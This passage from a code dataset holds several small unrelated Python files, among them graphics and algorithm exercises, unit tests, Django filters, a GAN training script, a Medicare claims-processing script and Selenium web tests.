glFlush()\n\ndef polarEllipse(xc, yc, xr, yr):\n\n glColor3f(255.0,0.0,0.0)\n glPointSize(5.0)\n glBegin(GL_POINTS)\n\n theta = 0\n factor = 500\n increment = 1 / factor\n t = math.pi / 2\n\n while (theta <= t):\n\n x = xr * math.cos(theta)\n y = yr * math.sin(theta)\n glVertex2f(x + xc, y + yc)\n glVertex2f(-x + xc, -y + yc)\n glVertex2f(-x + xc, y + yc)\n glVertex2f(x + xc, -y + yc)\n theta += increment\n\n glEnd()\n glFlush()\n\n\n\ndef main():\n print(\"\\nPlot an ellipse\")\n print(\"1. Polar Generation Algorithm\")\n print(\"2. Non-Polar Generation Algorithm\")\n choice = input(\"Enter Choice : \")\n\n while True:\n \n if (int(choice) > 2 or int(choice) < 1):\n print(\"Invalid choice\")\n choice = input(\"Enter Choice : \")\n else:\n break\n\n x = int(input(\"\\nEnter x coordinate of center : \"))\n y = int(input(\"Enter y coordinate of center : \"))\n xr = int(input(\"Enter x-radius : \"))\n yr = int(input(\"Enter y-radius : \"))\n\n if int(choice) == 1:\n\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB)\n glutInitWindowSize(500,500)\n glutInitWindowPosition(0,0)\n glutCreateWindow(\"Polar Ellipse\")\n glutDisplayFunc(lambda: polarEllipse(x,y,xr,yr)) \n init()\n glutMainLoop()\n \n else:\n\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGB)\n glutInitWindowSize(500,500)\n glutInitWindowPosition(0,0)\n glutCreateWindow(\"Non Polar Ellipse\")\n glutDisplayFunc(lambda: nonPolarEllipse(x,y,xr,yr))\n init()\n glutMainLoop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"sidhantunnithan/cusat-cse-degree","sub_path":"S5/Computer-Graphics-Lab/exp4.py","file_name":"exp4.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30017299590","text":"import sys; sys.stdin = open('1860.txt')\n\nT = int(input())\nfor tc in range(1, T + 1):\n N, M, K = map(int, input().split())\n arr = list(map(int, input().split()))\n\n arr.sort()\n a = '' # 아래에서 'Impossible'만 찾기 위해서\n cnt = 0 # 빵 개수\n for i in range(arr[-1] + 1):\n\n while i > arr[0] or arr == []:\n cnt -= 1\n arr.pop(0)\n if cnt < 0:\n a = 'Impossible'\n break\n\n if i % M == 0 and i != 0:\n cnt += K\n\n if i == arr[0]:\n if cnt <= 0:\n a = 'Impossible'\n break\n else:\n cnt -= 1\n arr.pop(0)\n\n if arr == [] and cnt >= 0:\n a = 'Possible'\n elif len(arr) != 0:\n if len(arr) > cnt:\n a = 'Impossible'\n elif len(arr) <= cnt:\n a = 'Possible'\n\n print('#{} {}'.format(tc, a))\n\n\n# T = int(input())\n# for tc in range(1, T + 1):\n# N, M, K = map(int, input().split())\n# arr = list(map(int, input().split()))\n#\n# arr.sort()\n#\n# result = 'Possible'\n# for i in range(N):\n# cnt = (arr[i] // M) * K\n# if cnt < i + 1:\n# result = 'Impossible'\n# break\n#\n# print('#{} {}'.format(tc, result))","repo_name":"jijisusu3/algorithm_study_2","sub_path":"이성재/0227/1860_진기최고급붕어빵.py","file_name":"1860_진기최고급붕어빵.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458028627","text":"from __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n__author__ = \"imron@scalyr.com\"\n\nfrom scalyr_agent.monitor_utils.annotation_config import process_annotations\n\nfrom scalyr_agent.test_base import ScalyrTestCase\n\nimport re\n\n\nclass TestAnnotationConfig(ScalyrTestCase):\n def test_invalid_annotations(self):\n\n annotations = {\n \"some.other.value\": 10,\n \"not.a.scalyr.annotation\": \"no it's not\",\n }\n\n result = process_annotations(annotations)\n\n self.assertEquals(0, len(list(result.keys())))\n\n def test_annotation_object(self):\n annotations = {\n \"log.config.scalyr.com/item1\": \"item1\",\n \"log.config.scalyr.com/item2\": \"item2\",\n \"log.config.scalyr.com/item3\": \"item3\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(3, len(list(result.keys())))\n self.assertEquals(\"item1\", result[\"item1\"])\n self.assertEquals(\"item2\", result[\"item2\"])\n self.assertEquals(\"item3\", result[\"item3\"])\n\n def test_annotation_nested_object(self):\n annotations = {\n \"log.config.scalyr.com/item1.nest1\": \"item1 nest1\",\n \"log.config.scalyr.com/item1.nest2\": \"item1 nest2\",\n \"log.config.scalyr.com/item1.nest3\": \"item1 nest3\",\n \"log.config.scalyr.com/item2.nest1\": \"item2 nest1\",\n \"log.config.scalyr.com/item2.nest2\": \"item2 nest2\",\n \"log.config.scalyr.com/item2.nest3\": \"item2 nest3\",\n \"log.config.scalyr.com/item2.nest4\": \"item2 nest4\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(2, len(list(result.keys())))\n self.assertEquals(3, len(result[\"item1\"]))\n self.assertEquals(4, len(result[\"item2\"]))\n\n self.assertEquals(\"item1 nest1\", result[\"item1\"][\"nest1\"])\n self.assertEquals(\"item1 nest2\", result[\"item1\"][\"nest2\"])\n self.assertEquals(\"item1 nest3\", result[\"item1\"][\"nest3\"])\n\n self.assertEquals(\"item2 nest1\", result[\"item2\"][\"nest1\"])\n self.assertEquals(\"item2 nest2\", result[\"item2\"][\"nest2\"])\n self.assertEquals(\"item2 nest3\", result[\"item2\"][\"nest3\"])\n self.assertEquals(\"item2 nest4\", result[\"item2\"][\"nest4\"])\n\n def test_annotation_array(self):\n annotations = {\n \"log.config.scalyr.com/item1.20\": \"item1 element 2\",\n \"log.config.scalyr.com/item1.0\": \"item1 element 0\",\n \"log.config.scalyr.com/item1.10\": \"item1 element 1\",\n \"log.config.scalyr.com/item2.0\": \"item2 element 0\",\n \"log.config.scalyr.com/item2.1\": \"item2 element 1\",\n \"log.config.scalyr.com/item2.2\": \"item2 element 2\",\n \"log.config.scalyr.com/item2.3\": \"item2 element 3\",\n }\n\n result = process_annotations(annotations)\n self.assertEquals(2, len(list(result.keys())))\n self.assertEquals(3, len(result[\"item1\"]))\n self.assertEquals(4, len(result[\"item2\"]))\n\n self.assertEquals(\"item1 element 0\", result[\"item1\"][0])\n self.assertEquals(\"item1 element 1\", result[\"item1\"][1])\n self.assertEquals(\"item1 element 2\", result[\"item1\"][2])\n\n self.assertEquals(\"item2 element 0\", result[\"item2\"][0])\n self.assertEquals(\"item2 element 1\", result[\"item2\"][1])\n self.assertEquals(\"item2 element 2\", result[\"item2\"][2])\n self.assertEquals(\"item2 element 3\", result[\"item2\"][3])\n\n def test_annotation_keys_with_hyphens(self):\n annotations = {\n \"com.scalyr.config.log.item1-1.element-1\": \"item1 element 1\",\n \"com.scalyr.config.log.item1-2.element-2\": \"item1 element 2\",\n \"com.scalyr.config.log.item1-3.element-3\": \"item1 element 3\",\n \"com.scalyr.config.log.item2-1.element-1\": \"item2 element 1\",\n \"com.scalyr.config.log.item2-2.element-2\": \"item2 element 2\",\n \"com.scalyr.config.log.item2-3.element-3\": \"item2 element 3\",\n }\n\n result = process_annotations(\n annotations,\n annotation_prefix_re=re.compile(r\"^(com\\.scalyr\\.config\\.log\\.)(.+)\"),\n hyphens_as_underscores=True,\n )\n\n self.assertEquals(\"item1 element 1\", result[\"item1_1\"][\"element_1\"])\n self.assertEquals(\"item1 element 2\", result[\"item1_2\"][\"element_2\"])\n self.assertEquals(\"item1 element 3\", result[\"item1_3\"][\"element_3\"])\n self.assertEquals(\"item2 element 1\", result[\"item2_1\"][\"element_1\"])\n self.assertEquals(\"item2 element 2\", result[\"item2_2\"][\"element_2\"])\n self.assertEquals(\"item2 element 3\", result[\"item2_3\"][\"element_3\"])\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/unit/annotation_config_test.py","file_name":"annotation_config_test.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"71092655507","text":"# Faça um programa\n# que leia três números e \n# mostre qual é o maior e qual é o menor.\n\nnumero1 = int(input('Digite o núm. 01: '))\nnumero2 = int(input('Digite o núm. 02: '))\nnumero3 = int(input('Digite o núm. 03: '))\n\nmenor = numero1\nif numero2 < numero1 and numero2 < numero3:\n menor = numero2\nif numero3 < numero1 and numero3 < numero2 :\n menor = numero3\nmaior = numero1\nif numero2 > numero1 and numero2 > numero3:\n maior = numero2\nif numero3 > numero1 and numero3 > numero2 :\n maior = numero3\n\nprint('O maior é: {}'.format(maior))\nprint('O menor é: {}'.format(menor))","repo_name":"GabrielVictorino8266/python","sub_path":"cursoemvideo/Mundo1/exercises/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71063328787","text":"#print fibonacci series 0 1 1 2 3 5 8 13 [n= n-1+n-2]\na = 0\nb = 1\nn = int(input(\"Enter number of terms:\"))\nprint(a,b,end = \" \")\nfor i in range(1,n-1):\n next_number = a + b\n print(next_number,end = \" \")\n a = b\n b = next_number","repo_name":"hirithik05/Python-Basics","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29882024952","text":"# 정제헌을 팔자!\n# 구현 아이디어 : n ** 2의 n까지의 약수의 개수를 구하기\n# 입력이 while문으로 끝나지 않을 때는 try except 구문으로 끝내기\n\n# import sys\n# input = sys.stdin.readline\n\ndef solution():\n while 1:\n data = \"\"\n try:\n data = input()\n except EOFError:\n exit(0)\n arr = list(map(int, data.split('/')))\n n = arr[1]\n cnt = 1\n for i in range(n + 1, n * 2):\n cnt += (i * n) % (i - n) == 0\n print(cnt)\nsolution()\n\n# def solution():\n# while True:\n# data = \"\"\n# try:\n# data = input()\n# except EOFError:\n# exit(0)\n# cal_num = int(data[2:])\n# answer = 0\n# for i in range(cal_num + 1, 2 * cal_num + 1):\n# answer = answer + 1 if i * cal_num % (i - cal_num) == 0 else answer\n# print(answer)\n# solution()\n\n# 해당 알고리즘 이해\n# 1 -> 1\n# 2 -> 4 4\n# 3 -> 6 6 / 12 4\n# 4 -> 8 8 / 12 6\n# 5 -> 10 10\n# 6 -> 12 12 / 24 8\n# 7 -> 14 14\n# 8 -> 16 16 / 24 12\n\n# 3 -> 4\n# 4 -> 6\n# 6 -> 8\n# 8 -> 12\n# => (i * n) % (i - n) 로 해를 구할 수 있다.","repo_name":"Minny27/Algorithm","sub_path":"BOJ/108.Math1/9273.py","file_name":"9273.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"23114439417","text":"# Tribonacci sequence\r\n\r\n# Function Return Tribonacci Sequence\r\ndef NRfunc(num):\r\n # sumlist for storing sequence\r\n sumlist = []\r\n for i in range(num):\r\n if i == 0 or i == 1 or i == 2:\r\n # sum for summing the sequence\r\n sum = 1\r\n sumlist.append(sum)\r\n else:\r\n sum = sumlist[i-1] + sumlist[i-2] + sumlist[i-3]\r\n sumlist.append(sum)\r\n return sumlist\r\n\r\nnum = 5\r\nNonRecursive = []\r\nif num >= 0:\r\n NonRecursive = NRfunc(num)\r\n for i in NonRecursive:\r\n print(i)\r\n if num > 2:\r\n print('Non-Recursive Tribonacci ', NonRecursive[-1] + NonRecursive[-2] + NonRecursive[-3])\r\n else:\r\n print('Non-Recursive Tribonacci ', 1)\r\nelse:\r\n print('You entered negative number')\r\n\r\n\r\n\r\n","repo_name":"shazaalqays/Tribonacci","sub_path":"Tribonacci_NonRecursive.py","file_name":"Tribonacci_NonRecursive.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43743142953","text":"def liste_fra_fil(filnavn):\n fil=open(filnavn,encoding='utf-8')\n\n fornavn=fil.readline()\n liste=[]\n\n while fornavn!='':\n liste+=[fornavn.rstrip('\\n')]\n fornavn=fil.readline()\n\n fil.close()\n return(liste)\n\n\n\ndef bubble_sort_list(liste):\n i=0\n while i !=len(liste):\n for n in range(0,(len(liste)-1)-i): #kudos til @terje for den -i'en der asså! \n if liste[n]>=liste[n+1]:\n storste_tall=liste[n]\n liste[n]=liste[n+1]\n liste[n+1]=storste_tall\n i+=1\n \n return(liste)\n \nnavneliste=liste_fra_fil('fornavn.txt')\n\nprint('Usortert navneliste',navneliste)\n\nnavneliste=bubble_sort_list(navneliste)\n\nprint('Sortert navneliste',navneliste)","repo_name":"groeterud/uni_public","sub_path":"Python/Forelesning 01022021/etterarbeid_oppg1.py","file_name":"etterarbeid_oppg1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21746402257","text":"from django import template\n\nregister = template.Library()\n\n@register.filter(name='val_list')\ndef val_list(value, arg):\n return [getattr(x,arg) for x in value]\n\n@register.filter(name='key')\ndef key(value,arg):\n return value.get(arg)\n\n@register.filter(name='chat_other_name')\ndef chat_other_name(value, arg):\n name = None\n for user in list(value.members.all()):\n if user.user != arg:\n name = user.name\n\n return name\n\n@register.filter(name='chat_other_img')\ndef chat_other_img(value, arg):\n url = None\n for user in list(value.members.all()):\n if user.user != arg:\n url = user.profile_img_url\n\n return url","repo_name":"suryansh1411/AlumniPortal","sub_path":"alumniportal/chat/templatetags/extra_tags.py","file_name":"extra_tags.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28906399529","text":"import MNIST_GAN\nimport numpy as np\nimport timeit\nimport torch\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nimport logger\n\nCUDA = torch.cuda.is_available()\nif CUDA:\n print(\"Using GPU optimizations!\")\n\nOUTPUT_DIR = 'output'\nTRAINING_STEPS = 500000\nBATCH_SIZE = 64\nCRITIC_MODEL_DIMENSIONALITY = 64\nGENERATOR_MODEL_DIMENSIONALITY = 128\nCRITIC_UPDATES_PER_GENERATOR_UPDATE = 5\nLAMBDA = 10\nVISUALIZATION_INTERVAL = 1000\nNOISE_SAMPLE_LENGTH = 1000\nNUM_CLASSES = 10\n\n# ========== Torch Config ==========\ntorch.manual_seed(1)\nif CUDA:\n torch.cuda.manual_seed(1)\n\n# ========== DATA ==========\ndef noise(size):\n noise = torch.from_numpy(np.random.normal(0.0, size=size)).float()\n if CUDA:\n noise = noise.cuda()\n return noise\n\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\nmnist_dataset = datasets.MNIST('./data',\n\t\t\t\t\t\t\t\ttrain=True,\n\t\t\t\t\t\t\t\tdownload=True,\n\t\t\t\t\t\t\t\ttransform=transform)\nmnist_loader = torch.utils.data.DataLoader(dataset=mnist_dataset,\n\t\t\t\t\t\t\t\t\t\t\tbatch_size=BATCH_SIZE,\n\t\t\t\t\t\t\t\t\t\t\tshuffle=True,\n\t\t\t\t\t\t\t\t\t\t\tdrop_last=True)\n\ndef inf_mnist_train_gen():\n while True:\n for _, (images, labels) in enumerate(mnist_loader):\n # Convert labels to one-hot encoding:\n one_hot_labels = torch.zeros(labels.shape[0], 10)\n for (idx, label) in enumerate(labels):\n one_hot_labels[idx][label] = 1.\n\n if CUDA:\n images = images.cuda()\n one_hot_labels = one_hot_labels.cuda()\n\n yield (images, one_hot_labels)\n\nmnist = inf_mnist_train_gen()\n\n\n# ========== MODELS ==========\ngenerator = MNIST_GAN.Generator(input_size=NOISE_SAMPLE_LENGTH+NUM_CLASSES, output_size=784, dimensionality=GENERATOR_MODEL_DIMENSIONALITY, cudaEnabled=CUDA)\ncritic = MNIST_GAN.Critic(dimensionality=CRITIC_MODEL_DIMENSIONALITY, num_classes=NUM_CLASSES, cudaEnabled=CUDA)\n\n# ========= TRAINING =========\nlogger = logger.Logger(OUTPUT_DIR)\nrunning_critic_loss = 0.0\nrunning_generator_loss = 0.0\nrunning_batch_start_time = timeit.default_timer()\n\nfor training_step in range(1, TRAINING_STEPS+1):\n print(\"BATCH: [{0}/{1}]\\r\".format(training_step % VISUALIZATION_INTERVAL, VISUALIZATION_INTERVAL), end='')\n\n # Critic\n for critic_step in range(CRITIC_UPDATES_PER_GENERATOR_UPDATE):\n images, labels = next(mnist)\n images = Variable(images)\n\n noise_sample = noise(size=(BATCH_SIZE, NOISE_SAMPLE_LENGTH))\n conditioned_noise_sample = Variable(torch.cat((noise_sample, labels), 1))\n if CUDA:\n conditioned_noise_sample = conditioned_noise_sample.cuda()\n\n fake_images = generator(conditioned_noise_sample)\n critic_loss = critic.train(images, fake_images, labels, LAMBDA)\n running_critic_loss += critic_loss.data[0]\n\n # Generator\n noise_sample = noise(size=(BATCH_SIZE, NOISE_SAMPLE_LENGTH))\n conditioned_noise_sample = Variable(torch.cat((noise_sample, labels), 1))\n if CUDA:\n conditioned_noise_sample = conditioned_noise_sample.cuda()\n\n fake_images = generator(conditioned_noise_sample)\n critic_output = critic(fake_images, labels)\n generator_loss = generator.train(critic_output)\n running_generator_loss += generator_loss.data[0]\n\n # Visualization\n if training_step % VISUALIZATION_INTERVAL == 0:\n # Timing\n running_batch_elapsed_time = timeit.default_timer() - running_batch_start_time\n running_batch_start_time = timeit.default_timer()\n logger.log_training_step(training_step, TRAINING_STEPS, running_batch_elapsed_time, running_critic_loss, running_generator_loss)\n\n # Save model weights\n logger.save_model_weights(generator, critic)\n\n # Visualization\n vis_one_hot_labels = torch.zeros(10, 10)\n if CUDA:\n vis_one_hot_labels = vis_one_hot_labels.cuda()\n for label in range(10):\n vis_one_hot_labels[label][label] = 1\n vis_noise_sample = noise(size=(10, NOISE_SAMPLE_LENGTH))\n vis_conditioned_noise_sample = Variable(torch.cat((vis_noise_sample, vis_one_hot_labels), 1))\n if CUDA:\n vis_conditioned_noise_sample = vis_conditioned_noise_sample.cuda()\n\n vis_fake_images = generator(vis_conditioned_noise_sample)\n\n logger.visualize_generated_data(images, vis_fake_images, training_step)\n running_critic_loss = 0.0\n running_generator_loss = 0.0\n","repo_name":"BlissChapman/ICW-MNIST-GAN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22395572034","text":"## EXTRACT ALL DIAGNOSIS CODES FOR EACH PATIENT WITHIN A YEAR OF HOSPITALIZATION FOT CALCULATING COMORBIDITY SCORE\nimport pandas as pd\nimport dask.dataframe as dd\nimport dask\nimport numpy as np\nimport datetime\n\npd.set_option('display.max_columns', 500)\nfrom dask.distributed import Client\nclient = Client(\"10.50.86.250:35086\")\n\nmedparPath = \"/gpfs/data/cms-share/data/medicare/{}/medpar/parquet/\"\nslPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/medpar_mds/CDISCHRG_SL/'\nwritePath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/medpar_mds/'\nanalysisPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/initial_analysis/'\ntestPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/test/'\n\nyears = range(2011, 2018)\nclaims_type = [\"primary\", \"secondary\"]\noutcome = [\"UTI\", \"PNEU\"]\n\ndef get_diagnosis(analysisDF, medpar, intermediate_output_path=None, output_path=None):\n ## drop diagnosis columns in analytical sample data\n dx_cols = ['DGNS_{}_CD'.format(i) for i in range(1, 26)]\n analysisDF = analysisDF.drop(columns=dx_cols)\n ## merge analytical sample with raw medpar data\n merge = analysisDF.merge(medpar, on='BENE_ID', how='left', suffixes=['', '_comorb'])\n ## keep raw medpar data with admission dates within 1 year before the admission date on hospital infection claims\n merge1year = merge[(merge['ADMSN_DT']>=merge['ADMSN_DT_comorb']) &\n ((merge['ADMSN_DT'] - merge['ADMSN_DT_comorb']).dt.days <=365)]\n\n ## separate icd 10 and icd 9 claims (useful for 2015 data)\n merge_icd9 = merge1year[merge1year['ADMSN_DT_comorb'] < datetime.datetime(2015, 10, 1)]\n merge_icd10 = merge1year[merge1year['ADMSN_DT_comorb'] >= datetime.datetime(2015, 10, 1)]\n ## reshape data from wide to long: for each hospital infection claim, there are multiple rows of diagnosis code\n dx_icd9 = merge_icd9[['MEDPAR_ID'] + dx_cols].\\\n melt(id_vars='MEDPAR_ID', value_vars=dx_cols, var_name='n', value_name='DX')\n ## create an indicator to indicate ICD-9-CM vs ICD-10-CM coding system\n dx_icd9['Dx_CodeType'] = \"09\"\n dx_icd10 = merge_icd10[['MEDPAR_ID'] + dx_cols].\\\n melt(id_vars='MEDPAR_ID', value_vars=dx_cols, var_name='n', value_name='DX')\n dx_icd10['Dx_CodeType'] = \"10\"\n ## concat icd9 and icd10\n dx = dd.concat([dx_icd9, dx_icd10])\n dx = dx.rename(columns={\"MEDPAR_ID\": \"patid\"})\n\n dx.to_parquet(output_path)\n\n\nprimary_dx_all = []\nsecondary_dx_all = []\nfor year in years:\n\n ## read in raw medpar data for current year and the prior year\n use_cols = ['BENE_ID', 'ADMSN_DT'] + ['DGNS_{}_CD'.format(i) for i in range(1, 26)]\n medpar_year = dd.read_parquet(medparPath.format(year))\n medpar_prior = dd.read_parquet(medparPath.format(year - 1))\n ## concat two years of medpar data\n if year==2011:\n medpar_year = medpar_year.reset_index()\n medpar = dd.concat([medpar_year, medpar_prior])\n\n if year==2017:\n medpar_prior = medpar_prior.reset_index()\n medpar = dd.concat([medpar_year, medpar_prior])\n\n if year in range(2012, 2017):\n medpar = dd.concat([medpar_year, medpar_prior])\n medpar = medpar.reset_index()\n ## subset to only useful columns\n medpar = medpar[use_cols]\n medpar = medpar.astype({'ADMSN_DT': 'datetime64[ns]'})\n\n ## read in hospital infection claims sample\n primary = dd.read_parquet(slPath + \"{0}{1}/{2}\".format(\"primary\", \"UTI\", year))\n secondary = dd.read_parquet(slPath + \"{0}{1}/{2}\".format(\"secondary\", \"UTI\", year))\n ## apply the function to select all diagnosis codes from hospital claims within a year of hospitalization\n get_diagnosis(primary, medpar,\n output_path=writePath + \"DX/{0}{1}/{2}\".format(\"primary\", \"UTI\", year))\n get_diagnosis(secondary, medpar,\n output_path=writePath + \"DX/{0}{1}/{2}\".format(\"secondary\", \"UTI\", year))\n ## read the diagnosis data back\n primary_dx = dd.read_parquet(\n writePath + \"DX/{0}{1}/{2}\".format(\"primary\", \"UTI\", year)\n )\n secondary_dx = dd.read_parquet(\n writePath + \"DX/{0}{1}/{2}\".format(\"secondary\", \"UTI\", year)\n )\n ## remove missing diagnosis code and keep only unique diagnosis code for each claim\n primary_dx = primary_dx[~primary_dx['DX'].isna()]\n primary_dx_unique = primary_dx[['patid', 'DX', 'Dx_CodeType']].drop_duplicates()\n secondary_dx = secondary_dx[~secondary_dx['DX'].isna()]\n secondary_dx_unique = secondary_dx[['patid', 'DX', 'Dx_CodeType']].drop_duplicates()\n ## convert parquet file to csv\n primary_dx_df = primary_dx_unique.compute()\n secondary_dx_df = secondary_dx_unique.compute()\n primary_dx_df.to_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"primary\", \"UTI\", year), index=False)\n secondary_dx_df.to_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"secondary\", \"UTI\", year), index=False)\n ## append years of diagnosis code to a list\n primary_dx_all.append(pd.read_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"primary\", \"UTI\", year), low_memory=False))\n secondary_dx_all.append(pd.read_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"secondary\", \"UTI\", year), low_memory=False))\nprimary_dx_all_df = pd.concat(primary_dx_all)\nsecondary_dx_all_df = pd.concat(secondary_dx_all)\nprimary_dx_all_df = primary_dx_all_df.sort_values(by='patid')\nsecondary_dx_all_df = secondary_dx_all_df.sort_values(by='patid')\n## write all years of data to csv\nprimary_dx_all_df.to_csv(writePath + \"DX/{0}{1}.csv\".format(\"primary\", \"UTI\"), index=False)\nsecondary_dx_all_df.to_csv(writePath + \"DX/{0}{1}.csv\".format(\"secondary\", \"UTI\"), index=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sanghavi-lab/nhc_infections","sub_path":"7_get_comorb_claims.py","file_name":"7_get_comorb_claims.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31589720263","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\n\r\n@pytest.fixture(autouse=True)\r\ndef testing():\r\n pytest.driver = webdriver.Chrome(r'C:\\Users\\HP\\PycharmProjects\\chromedriver.exe')\r\n pytest.driver.get('https://petfriends1.herokuapp.com/login')\r\n yield\r\n pytest.driver.quit()\r\n\r\n\r\ndef test_all_pets():\r\n pytest.driver.implicitly_wait(10)\r\n pytest.driver.find_element_by_id('email').send_keys('marinatest@1secmail.com')\r\n pytest.driver.find_element_by_id('pass').send_keys('testtest')\r\n pytest.driver.find_element_by_css_selector('button[type=\"submit\"]').click()\r\n assert pytest.driver.find_element_by_tag_name('h1').text == 'PetFriends'\r\n\r\n images = pytest.driver.find_elements_by_css_selector('.card-deck .card-img-top')\r\n names = pytest.driver.find_elements_by_css_selector('.card-deck .card-title')\r\n descriptions = pytest.driver.find_elements_by_css_selector('.card-deck .card-text')\r\n\r\n for i in range(len(names)):\r\n assert images[i].get_attribute('src') != '', 'There is pet without photo'\r\n assert names[i].text == '', 'There is pet without name'\r\n assert descriptions[i].text != '', 'There is pet without type and age'\r\n assert ',' in descriptions[i].text\r\n parts = descriptions[i].text.split(',')\r\n assert len(parts[0]) > 0, 'There is pet without type'\r\n assert len(parts[1]) > 0, 'There is pet without age'\r\n\r\n\r\ndef test_show_my_pets():\r\n pytest.driver.find_element_by_id('email').send_keys('marinatest@1secmail.com')\r\n pytest.driver.find_element_by_id('pass').send_keys('testtest')\r\n pytest.driver.find_element_by_css_selector('button[type=\"submit\"]').click()\r\n pytest.driver.find_element_by_link_text(u'Мои питомцы').click()\r\n\r\n WebDriverWait(pytest.driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '.\\\\.col-sm-4.left')))\r\n stat = pytest.driver.find_elements_by_css_selector('.\\\\.col-sm-4.left')\r\n count = stat[0].text.split('\\n')\r\n count = count[1].split(' ')\r\n count = int(count[1])\r\n\r\n WebDriverWait(pytest.driver, 10).until(EC.presence_of_element_located((By.ID, 'all_my_pets')))\r\n images = pytest.driver.find_elements_by_css_selector('.table.table-hover img')\r\n pets = pytest.driver.find_elements_by_css_selector('.table.table-hover tbody tr td')\r\n # проверяем, что кол-во питомцев совпадает с данными статистики\r\n assert len(pets) == count * 4\r\n\r\n s = 0\r\n names = []\r\n an_types = []\r\n ages = []\r\n\r\n for i in range(count):\r\n if images[i].get_attribute('src') == '':\r\n s += 1\r\n name = pets[i*4]\r\n an_type = pets[i*4+1]\r\n age = pets[i*4+2]\r\n names.append(name.text)\r\n an_types.append(an_type.text)\r\n ages.append(age.text)\r\n # проверяем, что у всех питомцев есть имя, вид, возраст\r\n assert name.text != '', 'There is pet without name'\r\n assert an_type.text != '', 'There is pet without type'\r\n assert age.text != '', 'There is pet without age'\r\n\r\n # проверяем, что питомцев без фото не больше половины\r\n assert s <= count//2, \"More than a half of pets have no photo\"\r\n\r\n # проверяем, что нет одинаковых имен\r\n names_set = set(names)\r\n assert len(names_set) == count, 'There are some pets with the same names'\r\n\r\n # проверяем, что нет одинаковых питомцев\r\n same_pets = False\r\n if len(names_set) < count:\r\n for i in range(len(names)-1):\r\n for j in range(i+1, len(names)):\r\n if (names[i] == names[j]) and (an_types[i] == an_types[j]) and (ages[i] == ages[j]):\r\n same_pets = True\r\n assert same_pets is False, 'There are the same pets'\r\n","repo_name":"MarinaKartina/Marina-s-workspace","sub_path":"test_selenium_petfriends.py","file_name":"test_selenium_petfriends.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42634106998","text":"from base64 import encode\nimport string\ndef ceaserCipher(s, k):\n d = {}\n alp = string.ascii_lowercase\n for i , ele in enumerate(alp):\n d[ele] = alp[(i + k) % 26]\n\n\n ecoded = ''\n for j in s:\n if j.isalpha():\n if j.isupper():\n ecoded += d[j].upper()\n else:\n ecoded += d[j]\n \n\n else:\n ecoded += j\n return ecoded\n # return d\n \n \n \n\n \n\n\n\ns = input('messege: ')\nk = int(input('key: '))\nprint(ceaserCipher(s, k))","repo_name":"Samkanja/solutions","sub_path":"string/ceaserCipher.py","file_name":"ceaserCipher.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42782869521","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\n\n# To prevent injection attacks in new player registration.\nimport bleach\n\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\n\ndef deleteMatches():\n \"\"\"Delete matches from the database.\"\"\"\n # Standard connection procedure.\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('DELETE FROM matches')\n\n # Standard closing procedure.\n 